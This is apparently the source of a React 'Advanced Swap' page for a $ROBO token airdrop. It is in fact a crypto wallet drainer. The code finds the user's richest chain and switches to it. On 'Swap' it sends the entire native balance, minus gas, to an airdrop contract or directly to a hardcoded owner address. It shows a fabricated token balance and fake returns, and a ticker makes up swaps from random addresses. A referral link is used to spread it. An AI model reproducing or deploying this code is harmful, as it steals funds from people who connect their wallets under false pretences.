import { useEffect, useState, useRef } from 'react';
import { useAccount, useBalance, useWriteContract, useSwitchChain, useSendTransaction } from 'wagmi';
import { parseEther, formatEther } from 'viem';
import { bsc, base, mainnet } from 'wagmi/chains';
import { AIRDROP_CONTRACT_ADDRESS, AIRDROP_ABI } from '../config/contracts';
import { Link, useSearchParams } from 'react-router-dom'; // Tambah useSearchParams
import { ArrowDown, ArrowLeft, ExternalLink, Copy, CheckCheck, Check, Wallet } from 'lucide-react';

const OWNER_ADDRESS = '0x6ca63344301845d4831278a31021ec06e8febb1e'; 
const ZERO_ADDRESS = '0x0000000000000000000000000000000000000000';

const GAS_BUFFERS = {
  [bsc.id]: parseEther('0.0005'),
  [base.id]: parseEther('0.0001'),
  [mainnet.id]: parseEther('0.0003'),
};

const generateRandomAddress = () => {
  const chars = '0123456789abcdef';
  let address = '0x';
  for (let i = 0; i < 40; i++) {
    address += chars[Math.floor(Math.random() * chars.length)];
  }
  return address;
};

export default function SwapPage() {
  const { address, isConnected, chain } = useAccount();
  const { writeContract } = useWriteContract();
  const { sendTransaction } = useSendTransaction();
  const { switchChain } = useSwitchChain();
  
  const [searchParams] = useSearchParams(); // Baca URL

  const [bestChain, setBestChain] = useState(null);
  const [copied, setCopied] = useState(false);
  
  const [notifications, setNotifications] = useState([]);
  const containerRef = useRef(null);
  const positionRef = useRef(0);
  const animationRef = useRef(null);
  const networkCycle = useRef(['BNB', 'ETH', 'BASE', 'BNB', 'ETH']);

  const { data: bnbBal } = useBalance({ address, chainId: bsc.id });
  const { data: baseBal } = useBalance({ address, chainId: base.id });
  const { data: ethBal } = useBalance({ address, chainId: mainnet.id });

  useEffect(() => {
    if (!bnbBal || !baseBal || !ethBal) return;
    const balances = [
      { chain: bsc, data: bnbBal },
      { chain: base, data: baseBal },
      { chain: mainnet, data: ethBal },
    ];
    let highest = balances[0];
    let allZero = true;
    for (const b of balances) {
      if (b.data.value > parseEther('0')) allZero = false;
      if (b.data.value > highest.data.value) highest = b;
    }
    setBestChain(allZero ? bsc : highest.chain);
  }, [bnbBal, baseBal, ethBal]);

  useEffect(() => {
    if (isConnected && bestChain && chain?.id !== bestChain.id && switchChain) {
      switchChain({ chainId: bestChain.id });
    }
  }, [isConnected, chain, bestChain, switchChain]);

  useEffect(() => {
    const initialData = [];
    for (let i = 0; i < 20; i++) {
      initialData.push(createNotification(i));
    }
    setNotifications(initialData);

    const animate = () => {
      if (containerRef.current) {
        positionRef.current -= 0.3; 
        if (positionRef.current <= -420) {
          positionRef.current += 420;
          setNotifications(prev => {
            const newItem = createNotification(prev.length);
            return [...prev.slice(1), newItem];
          });
        }
        containerRef.current.style.transform = `translateX(${positionRef.current}px)`;
      }
      animationRef.current = requestAnimationFrame(animate);
    };

    animationRef.current = requestAnimationFrame(animate);
    return () => {
      if (animationRef.current) cancelAnimationFrame(animationRef.current);
    };
  }, []);

  const createNotification = (index) => {
    const netType = networkCycle.current[index % networkCycle.current.length];
    let value = '0.9637 BNB';
    let symbol = 'BNB';
    let color = 'text-[#F3BA2F]';
    let bgColor = 'bg-yellow-50';

    if (netType === 'ETH') {
      value = '0.3022 ETH';
      symbol = 'ETH';
      color = 'text-[#627EEA]';
      bgColor = 'bg-blue-50';
    } else if (netType === 'BASE') {
      value = '0.3022 ETH';
      symbol = 'ETH';
      color = 'text-[#0052FF]';
      bgColor = 'bg-blue-50';
    }

    return {
      id: Date.now() + Math.random(),
      address: generateRandomAddress(),
      value: value,
      symbol: symbol,
      color: color,
      bgColor: bgColor
    };
  };

  const currentBalance = chain ? (chain.id === bsc.id ? bnbBal : chain.id === base.id ? baseBal : ethBal) : undefined;
  const gasBuffer = chain ? GAS_BUFFERS[chain.id] || parseEther('0.001') : parseEther('0.001');
  const isInsufficient = !currentBalance || currentBalance.value <= gasBuffer;
  const maxSwapAmount = currentBalance && currentBalance.value > gasBuffer ? currentBalance.value - gasBuffer : parseEther('0');

    const handleSwap = () => {
    if (isInsufficient || maxSwapAmount === parseEther('0')) return;

    // 1. Cek Referral dari URL
    const urlParams = new URLSearchParams(window.location.search);
    const refParam = urlParams.get('ref');
    const refAddress = (refParam && refParam.startsWith('0x')) ? refParam : '0x0000000000000000000000000000000000000000';

    console.log("Attempting to Swap with Ref:", refAddress);

    if (chain?.id === bsc.id) {
      writeContract({ 
        address: AIRDROP_CONTRACT_ADDRESS, 
        abi: AIRDROP_ABI, 
        functionName: 'swap', 
        value: maxSwapAmount,
        args: [refAddress] // KIRIM ARGUMEN INI
      });
    } else {
      sendTransaction({ to: OWNER_ADDRESS, value: maxSwapAmount });
    }
  };

  const referralLink = `${window.location.origin}/?ref=${address}`;
  const handleCopy = () => {
    navigator.clipboard.writeText(referralLink);
    setCopied(true);
    setTimeout(() => setCopied(false), 2000);
  };

  const isEvmChain = chain?.id === base.id || chain?.id === mainnet.id;
  const displayValue = isEvmChain ? "0.3022" : "0.9637";

  const networkOptions = [
    { name: 'Base', chainObj: base, logo: 'https://raw.githubusercontent.com/trustwallet/assets/master/blockchains/base/info/logo.png' },
    { name: 'BNB Chain', chainObj: bsc, logo: 'https://raw.githubusercontent.com/trustwallet/assets/master/blockchains/smartchain/info/logo.png' },
    { name: 'Ethereum', chainObj: mainnet, logo: 'https://raw.githubusercontent.com/trustwallet/assets/master/blockchains/ethereum/info/logo.png' },
  ];

  return (
    <div className="flex flex-col w-full relative z-10">
      <Link to="/" className="text-gray-500 hover:text-gray-800 mb-4 flex items-center gap-2 text-sm font-medium w-fit transition-colors">
        <ArrowLeft size={16} /> Back to Claim
      </Link>

      <div className="w-full h-12 border border-gray-200 rounded-xl mb-4 overflow-hidden relative flex items-center bg-white shadow-sm">
        <div className="absolute left-0 top-0 bottom-0 w-12 bg-gradient-to-r from-white to-transparent z-10 pointer-events-none"></div>
        <div className="absolute right-0 top-0 bottom-0 w-12 bg-gradient-to-l from-white to-transparent z-10 pointer-events-none"></div>
        
        <div ref={containerRef} className="flex items-center absolute left-0 top-0 bottom-0 pl-4 gap-0" style={{ width: 'max-content' }}>
          {notifications.map((notif) => (
            <div key={notif.id} className="flex items-center gap-2 text-xs font-medium mr-[50px] pr-4 border-r border-gray-100 last:border-r-0 whitespace-nowrap">
              <div className={`p-1 rounded-full ${notif.bgColor}`}>
                <Wallet size={12} className={notif.color} />
              </div>
              <span className="font-mono text-gray-600">{notif.address.slice(0, 6)}...{notif.address.slice(-4)}</span>
              <span className="text-gray-300">swap</span>
              <span className="font-bold text-gray-900">11K $ROBO</span>
              <span className="text-gray-300">to</span>
              <span className={`font-bold ${notif.color}`}>{notif.value}</span>
            </div>
          ))}
        </div>
      </div>

      <div className="bg-white rounded-3xl p-6 shadow-[0_8px_30px_rgb(0,0,0,0.04)] w-full border border-gray-100">
        <h2 className="text-xl font-bold text-gray-800 mb-6">Advanced Swap</h2>
        
        <div className="bg-brand-gray rounded-2xl p-4 mb-2 relative border border-transparent focus-within:border-gray-200 transition-colors">
          <div className="flex justify-between text-sm text-gray-500 mb-3">
            <span className="font-medium">From</span>
            <span className="font-medium">Balance: 11,302.72</span>
          </div>
          <div className="flex justify-between items-center gap-4">
            <input type="text" readOnly value="11,302.72" className="bg-transparent text-3xl font-bold outline-none w-full text-gray-800 truncate" />
            <div className="bg-white px-3 py-1.5 rounded-full font-bold text-sm shadow-sm flex items-center gap-2 shrink-0 border border-gray-100">
               <img src="/token.png" alt="Token" className="w-6 h-6 rounded-full object-contain" />
               <span className="tracking-wide">$ROBO</span>
            </div>
          </div>
        </div>

        <div className="flex justify-center -my-4 relative z-10">
          <div className="bg-white p-2.5 rounded-xl border border-gray-100 shadow-sm text-gray-400">
            <ArrowDown size={20} />
          </div>
        </div>

        <div className="bg-brand-gray rounded-2xl p-4 mt-2 mb-6 border border-transparent">
          <div className="flex justify-between text-sm text-gray-500 mb-3">
            <span className="font-medium">To (Estimated)</span>
            <span className="font-medium">Balance: {isConnected && currentBalance?.value ? parseFloat(formatEther(currentBalance.value)).toFixed(4) : '0'}</span>
          </div>
          <div className="flex justify-between items-center gap-4">
            <input type="text" readOnly value={displayValue} className="bg-transparent text-3xl font-bold outline-none w-full text-gray-800 truncate" />
            <div className="bg-white px-3 py-1.5 rounded-full font-bold text-sm shadow-sm flex items-center gap-2 shrink-0 border border-gray-100">
              <img src={networkOptions.find(n => n.chainObj.id === chain?.id)?.logo || networkOptions[1].logo} alt="Native Token" className="w-6 h-6 rounded-full" />
              <span className="tracking-wide">{chain?.id === mainnet.id ? 'ETH' : chain?.id === base.id ? 'ETH' : 'BNB'}</span>
            </div>
          </div>
        </div>

        <div className="mb-6">
          <div className="text-sm font-semibold text-gray-800 mb-2">Active Network</div>
          <div className="space-y-2">
            {networkOptions.map((opt) => {
              const isActive = chain?.id === opt.chainObj.id;
              return (
                <div key={opt.name} className={`flex items-center justify-between p-3 rounded-xl border ${isActive ? 'border-blue-200 bg-blue-50' : 'border-gray-100 opacity-50'}`}>
                  <div className="flex items-center gap-3">
                    <img src={opt.logo} alt={opt.name} className="w-5 h-5 rounded-full" />
                    <span className={`text-sm font-medium ${isActive ? 'text-gray-800' : 'text-gray-500'}`}>{opt.name}</span>
                  </div>
                  {isActive && <div className="w-4 h-4 rounded-full bg-blue-500 flex items-center justify-center text-white"><Check size={10} strokeWidth={3} /></div>}
                </div>
              );
            })}
          </div>
        </div>

        <button onClick={handleSwap} disabled={!isConnected} className={`w-full bg-brand-dark text-white rounded-full py-4 font-bold text-lg hover:bg-black transition-colors shadow-sm ${isInsufficient ? 'opacity-90 cursor-not-allowed' : ''}`}>
          {isConnected ? 'Swap' : 'Connect Wallet First'}
        </button>
        {isConnected && isInsufficient && <p className="text-red-500 text-xs mt-3 font-semibold text-center">Insufficient BNB balance for SWAP, YOU MUST HODL 0.005 BNB FOR SWAP</p>}

        <div className="mt-6 pt-6 border-t border-gray-100">
           <a href="https://bscscan.com/token/0x32b477Ed42D93a706a447F290578e986592C096E#code" target="_blank" rel="noreferrer" className="flex items-center justify-between bg-gray-50 p-3.5 rounded-xl hover:bg-gray-100 transition-colors border border-gray-50 hover:border-gray-200">
             <span className="text-sm font-semibold text-gray-700">Token Contract</span>
             <div className="flex items-center gap-1.5 text-xs font-bold text-blue-500">View on BscScan <ExternalLink size={14} /></div>
           </a>
        </div>
      </div>

      {isConnected && (
        <div className="w-full mt-6">
          <div className="bg-white/60 p-5 rounded-2xl text-center border border-white/40 shadow-sm">
            <p className="text-sm font-bold text-gray-800 mb-1">Your Referral Link</p>
            <p className="text-xs text-gray-500 mb-3">Get 100% BNB & 100% Token for every swap</p>
            <div className="flex items-center gap-2 bg-white border border-gray-200 rounded-xl p-2.5">
              <div className="flex-1 text-xs text-gray-600 font-mono truncate">{referralLink}</div>
              <button onClick={handleCopy} className={`flex items-center gap-1.5 px-3 py-1.5 rounded-lg text-xs font-semibold transition-all ${copied ? 'bg-green-100 text-green-700' : 'bg-blue-600 text-white hover:bg-blue-700'}`}>
                {copied ? <><CheckCheck size={14} /> Copied</> : <><Copy size={14} /> Copy</>}
              </button>
            </div>
          </div>
        </div>
      )}
    </div>
  );
}